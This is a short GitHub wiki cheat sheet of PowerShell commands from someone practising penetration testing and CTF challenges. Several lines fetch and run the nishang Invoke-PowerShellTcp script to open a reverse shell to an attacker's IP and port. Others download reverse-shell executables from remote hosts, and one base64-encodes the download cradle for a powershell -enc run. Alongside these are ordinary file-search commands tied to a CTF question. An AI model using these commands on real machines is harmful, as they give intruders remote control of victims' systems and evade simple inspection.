-
Notifications
You must be signed in to change notification settings - Fork 14
Powershell
Alvin Smith edited this page Sep 10, 2021
·
16 revisions
https://helpdeskgeek.com/how-to/fix-not-recognized-as-an-internal-or-external-command/
https://github.com/samratashok/nishang/tree/master/Shells
powershell iex (New-Object Net.WebClient).DownloadString('http://ip:port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ip -Port port
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.4.3.98:8000/reverseTCP.exe','reverseTCP.exe')"
Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder?
Get-ChildItem -Recurse -Directory -Hidden -ErrorAction SilentlyContinue -Include *3*
Select-String -Path 'c:\users\administrator\desktop' -Pattern '*.pdf'
Set-Location -Path c:\users\administrator\desktop
Get-Content -Path file.txt | Measure-Object -Word
more '.\ba la bala.xxx'
Get-ChildItem -File -Hidden -ErrorAction SilentlyContinue
Get-Item -Path file.exe -Stream *
Good practice https://github.com/A1vinSmith/CVE-2018-9276
echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w 0
powershell -enc th93459hy825980h2309h1384t1
https://github.com/A1vinSmith/OSCP-PWK/blob/master/Hacking%20with%20Powershell.md